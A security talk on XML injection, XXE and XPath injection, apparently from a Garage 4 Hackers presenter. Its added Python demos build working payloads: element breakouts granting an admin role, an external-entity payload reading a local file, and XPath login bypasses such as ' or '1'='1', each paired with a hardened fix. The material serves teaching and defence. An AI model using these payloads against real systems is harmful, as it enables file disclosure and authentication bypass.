Lesser Known Injections: XML Injections. AMol NAik
About me: Web Application Pentester. Core member of Garage 4 Hackers. Bounty Hunter in the past. Currently fuzzing browsers for Fun & Profit.
Garage 4 Hackers: family of 3,800+. 8k+ posts. 40+ best Bug Bounty submissions. 15+ browser bugs in Chrome, IE, FF & Safari. ASLR bypass method presented at CanSecWest was already shared on the G4H forum. 5+ Information Security Research projects (cable TV & Datacard). 10+ tools & scripts. 1+ web application CTF. Ranchhoddas Webcast Series: 5+ webinars. Follow us on Twitter @garage4hackers
Agenda: XML Basics. XML Injection. XXE Attack. XPath Basics. XPath Injections.
"XXE is the new SQL Injection" - Someone on Twitter
XML Injection in the Real World: Yandex pwned for $5000 with XXE by @d0znpp. OpenID XXE by Reginaldo Silva. Multiple XXE bugs by the @Securatary team. XXE in Google Toolbar by the Detectify team, $10k.
XML Basics
XML Basics: eXtensible Markup Language. Flexible text-based format. Presents structured information. Used for data exchange and storage.
XML Components
XML – CDATA Section: tells the parser not to treat the characters in this section as markup; everything between <![CDATA[ and the closing ]]> is taken as literal character data. Examples:
XML Injections
XML Injections Injection Points
XML Injection – Node Attribute
XML Injection – Node Value
XML Injection – CDATA Section
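The three injection points above (node attribute, node value, CDATA section) are images on the original slides. The following Python is an added example, not the author's code: each vulnerable builder pastes user input straight into the markup, each hardened builder beside it escapes or builds through the API, and the parser-side helpers show what a consumer of the document ends up reading. The element names (user, role, post, body) and the payloads are constructed for the demo.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Constructed payloads (not from the slides), one per injection point.
# Each one closes the construct the value sits in and opens a new one
# that carries an attacker-chosen <role>.
ATTR_PAYLOAD = 'eve"/><user role="admin" name="mallory'
VALUE_PAYLOAD = 'eve</name><role>admin</role><name>'
CDATA_PAYLOAD = 'hello]]><role>admin</role><![CDATA['


# --- vulnerable builders: raw string concatenation ------------------------

def attr_vulnerable(name):
    """Node attribute injection point."""
    return '<users><user role="user" name="%s"/></users>' % name


def value_vulnerable(name):
    """Node value injection point."""
    return '<user><name>%s</name><role>user</role></user>' % name


def cdata_vulnerable(comment):
    """CDATA section injection point."""
    return '<post><body><![CDATA[%s]]></body><role>user</role></post>' % comment


# --- hardened builders ----------------------------------------------------

def attr_safe(name):
    # quoteattr() escapes &, <, > and wraps the value in a quote character
    # it does not contain (escaping it otherwise), so the attribute and the
    # element it lives in cannot be closed early.
    return '<users><user role="user" name=%s/></users>' % quoteattr(name)


def value_safe(name):
    # Build the tree through the API; serialisation escapes <, > and &.
    user = ET.Element("user")
    ET.SubElement(user, "name").text = name
    ET.SubElement(user, "role").text = "user"
    return ET.tostring(user, encoding="unicode")


def cdata_safe(comment):
    # Nothing is escaped inside CDATA; the only way out is the literal "]]>",
    # so split that sequence across two adjacent CDATA sections.
    return cdata_vulnerable(comment.replace("]]>", "]]]]><![CDATA[>"))


# --- what the consuming parser sees ---------------------------------------

def users(xml_text):
    """(name, role) of every <user> element the parser finds."""
    root = ET.fromstring(xml_text)
    return [(u.get("name"), u.get("role")) for u in root.iter("user")]


def first_role(xml_text):
    """First <role> in document order, which is what a naive consumer reads."""
    return ET.fromstring(xml_text).find(".//role").text


if __name__ == "__main__":
    print(users(attr_vulnerable(ATTR_PAYLOAD)))   # a second, admin user appears
    print(users(attr_safe(ATTR_PAYLOAD)))         # one user whose name is the raw payload
    print(first_role(value_vulnerable(VALUE_PAYLOAD)), first_role(value_safe(VALUE_PAYLOAD)))
    print(first_role(cdata_vulnerable(CDATA_PAYLOAD)), first_role(cdata_safe(CDATA_PAYLOAD)))
```

The attribute case is worth noting: injecting a second `role` attribute into the same element would make the document ill-formed (duplicate attribute), so the payload closes the element and adds a sibling instead; the vulnerability is still exploitable, just not in the most obvious way.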
XXE Attack
XML Entity: a named variable declared in the DTD and referenced as &name;. It can be internal (the replacement text is given inline) or external (a SYSTEM or PUBLIC identifier that the parser fetches, from the local file system or over the network). XXE abuses an external entity to make the parser read a resource the attacker chooses and return its contents in the document.
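The XXE attack slides are images in the original. The following Python is an added example, not the author's code: it builds the classic file-disclosure payload (a SYSTEM entity pointing at a local file, referenced from element content) and parses it twice with the standard library's xml.sax parser, once with external general entities enabled and once with the default setting. The target file is a constructed stand-in created in a temp directory, so the demo runs offline.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class TextCollector(ContentHandler):
    """Gathers all character data the parser delivers inside the document."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)

    def text(self):
        return "".join(self.chunks)


def parse(xml_bytes, resolve_external_entities):
    """Parse with xml.sax; the flag is the only difference between the two runs."""
    parser = xml.sax.make_parser()
    # feature_external_ges controls whether SYSTEM/PUBLIC general entities are
    # fetched. It has defaulted to False since Python 3.7.1; a service that
    # turns it on (or a parser whose default is True) is exposed to XXE.
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text()


def xxe_payload(target_path):
    """Classic file-disclosure XXE: an external entity pointing at a local
    file, referenced from element content so its bytes come back in the
    parsed document."""
    uri = pathlib.Path(target_path).resolve().as_uri()
    doc = (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE data [\n'
        '  <!ENTITY xxe SYSTEM "%s">\n'
        ']>\n'
        '<data>&xxe;</data>\n'
    )
    return (doc % uri).encode()


def xxe_demo():
    """Return (text seen with external entities on, text seen with them off)."""
    # Constructed stand-in for a sensitive file; in a real attack this would
    # be something like /etc/passwd or an application config file.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        secret = f.name
    try:
        payload = xxe_payload(secret)
        return parse(payload, True), parse(payload, False)
    finally:
        os.unlink(secret)


if __name__ == "__main__":
    leaked, blocked = xxe_demo()
    print("external entities on :", repr(leaked))
    print("external entities off:", repr(blocked))
```

With the feature on, the file's bytes arrive through the ordinary `characters` callback as if they had been typed into `<data>`; with it off, the entity reference expands to nothing. The same SYSTEM identifier can name an http:// URL, which is what turns XXE into server-side request forgery, and a DTD fetched by the parser can itself carry further entities, which is how out-of-band exfiltration works when the response never echoes the content.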
XPath Basics: a language for selecting nodes in an XML document. It treats the XML data as a tree of nodes. Similar to SQL (in some sense).
XPath Syntax: uses path expressions to select nodes or node-sets in an XML document.
Expression - Description
nodename - Selects all child nodes of the named node
/ - Selects from the root node
// - Selects nodes from the current node that match the selection no matter where they are
. - Selects the current node
.. - Selects the parent of the current node
XPath Predicates: used to find a specific node or a node that contains a specific value. Always embedded in square brackets.
Expression - Result
/Employees/Employee[1] - Selects the first 'Employee' element that is a child of the 'Employees' element
/Employees/Employee[last()] - Selects the last 'Employee' element that is a child of the 'Employees' element
/Employees/Employee[position()<3] - Selects the first two 'Employee' elements that are children of the 'Employees' element
//Employee[@ID='1'] - Selects all 'Employee' elements that have an attribute named 'ID' with a value of '1'
XPath Location Path Syntax: axisname::nodetest[predicate]
Example - Result
child::Employee - Selects all 'Employee' nodes that are children of the current node
attribute::id - Selects the id attribute of the current node
child::* - Selects all children of the current node
attribute::* - Selects all attributes of the current node
child::text() - Selects all text child nodes of the current node
child::node() - Selects all child nodes of the current node
descendant::Employees - Selects all 'Employees' descendants of the current node
XPath Injection. XPath Query: /Employees/Employee[UserName/text() = 'user' and Password/text() = 'passwd']/Type/text()
XPath Injection, no UserName & Password known:
XPath Injection, UserName known: /Employees/Employee[UserName/text() = 'mbrown' or '1'='1' and Password/text() = 'anything']/Type/text(). Because 'and' binds tighter than 'or', the predicate is true for mbrown whatever the password is.
XPath Injection, no UserName & Password known & Password field is not vulnerable:
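The payloads for the three XPath injection cases are images on the original slides. The following Python is an added example, not the author's code: it builds the slides' query by string concatenation, then evaluates it against a constructed employee store with a small evaluator that implements only the predicate grammar the slides use (string literals, Child/text(), '=', 'and', 'or') with XPath 1.0 precedence, so it is a stand-in for a real XPath engine rather than one. The employee data, the `s3cret`/`hunter2` passwords and the payload strings are constructed for the demo; the hardened `build_query_safe` is one possible fix, not the author's.

```python
import re
import xml.etree.ElementTree as ET

# Constructed employee store in the shape the slides' query expects
# (/Employees/Employee with UserName, Password and Type children).
EMPLOYEES_XML = """
<Employees>
  <Employee ID="1"><UserName>mbrown</UserName><Password>s3cret</Password><Type>Admin</Type></Employee>
  <Employee ID="2"><UserName>jsmith</UserName><Password>hunter2</Password><Type>User</Type></Employee>
</Employees>
"""
EMPLOYEES = ET.fromstring(EMPLOYEES_XML.strip())

TEMPLATE = "/Employees/Employee[UserName/text() = %s and Password/text() = %s]/Type/text()"


def build_query(username, password):
    """Vulnerable builder from the slides: raw values pasted into the literals."""
    return TEMPLATE % ("'%s'" % username, "'%s'" % password)


def xpath_literal(value):
    """Hardened literal. XPath 1.0 has no escape sequence inside a string
    literal, so a single quote can always close it; refuse it. (A value with
    both quote kinds would need concat(); binding an XPath variable is the
    better fix where the library offers one.)"""
    if "'" in value:
        raise ValueError("quote not allowed in XPath input")
    return "'%s'" % value


def build_query_safe(username, password):
    return TEMPLATE % (xpath_literal(username), xpath_literal(password))


# Minimal evaluator for the predicate grammar used on the slides:
#   expr := and_expr ('or' and_expr)*   and_expr := cmp ('and' cmp)*
#   cmp  := operand '=' operand          operand  := 'literal' | Child/text()
# 'and' binds tighter than 'or', as in XPath 1.0; the injections rely on that.
TOKEN = re.compile(r"\s*(?:'([^']*)'|(\w+)/text\(\)|(and|or)|(=))")


def tokenize(pred):
    tokens, pos, pred = [], 0, pred.strip()
    while pos < len(pred):
        m = TOKEN.match(pred, pos)
        if not m:
            raise ValueError("cannot tokenize %r" % pred[pos:])
        lit, path, op, _eq = m.groups()
        if lit is not None:
            tokens.append(("lit", lit))
        elif path is not None:
            tokens.append(("path", path))
        elif op is not None:
            tokens.append(("op", op))
        else:
            tokens.append(("eq", "="))
        pos = m.end()
    return tokens


def evaluate(pred, employee):
    """True if the predicate selects this Employee element."""
    tokens, pos = tokenize(pred), 0

    def operand():
        nonlocal pos
        kind, value = tokens[pos]
        pos += 1
        if kind == "lit":
            return value
        if kind == "path":                       # child::value/text()
            return employee.findtext(value) or ""
        raise ValueError("unexpected %r" % value)

    def comparison():
        nonlocal pos
        left = operand()
        if tokens[pos][0] != "eq":
            raise ValueError("expected '='")
        pos += 1
        return left == operand()

    def and_expr():
        nonlocal pos
        result = comparison()
        while pos < len(tokens) and tokens[pos] == ("op", "and"):
            pos += 1
            result = comparison() and result    # evaluate first: keep consuming tokens
        return result

    def or_expr():
        nonlocal pos
        result = and_expr()
        while pos < len(tokens) and tokens[pos] == ("op", "or"):
            pos += 1
            result = and_expr() or result
        return result

    result = or_expr()
    if pos != len(tokens):
        raise ValueError("trailing tokens in predicate")
    return result


QUERY_SHAPE = re.compile(r"^/Employees/Employee\[(.*)\]/Type/text\(\)$", re.S)


def run_query(query):
    """Return the Type text of every Employee the predicate selects."""
    m = QUERY_SHAPE.match(query)
    if not m:
        raise ValueError("unsupported query shape")
    pred = m.group(1)
    return [e.findtext("Type") for e in EMPLOYEES.findall("Employee") if evaluate(pred, e)]


if __name__ == "__main__":
    # Constructed payloads for the three cases on the slides.
    print(run_query(build_query("mbrown", "s3cret")))                  # legitimate login
    print(run_query(build_query("' or '1'='1", "' or '1'='1")))        # no credentials known
    print(run_query(build_query("mbrown' or '1'='1", "anything")))     # username known
    print(run_query(build_query("' or '1'='1' or ''='", "anything")))  # password field not injectable
    try:
        build_query_safe("mbrown' or '1'='1", "anything")
    except ValueError as exc:
        print("hardened builder rejected payload:", exc)
```

The third payload is the one for the "password is not vulnerable" case: its trailing `or ''='` absorbs the `and Password/text() = '...'` clause into an `and` group that no longer matters, so the username field alone is enough even when the password is hashed or validated before it reaches the query.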
Conclusion: XML injections are widely overlooked, and many sites still have these issues.
That's It !! AMol NAik @amolnaik4 mailto:amolnaik4@garage4hackers.com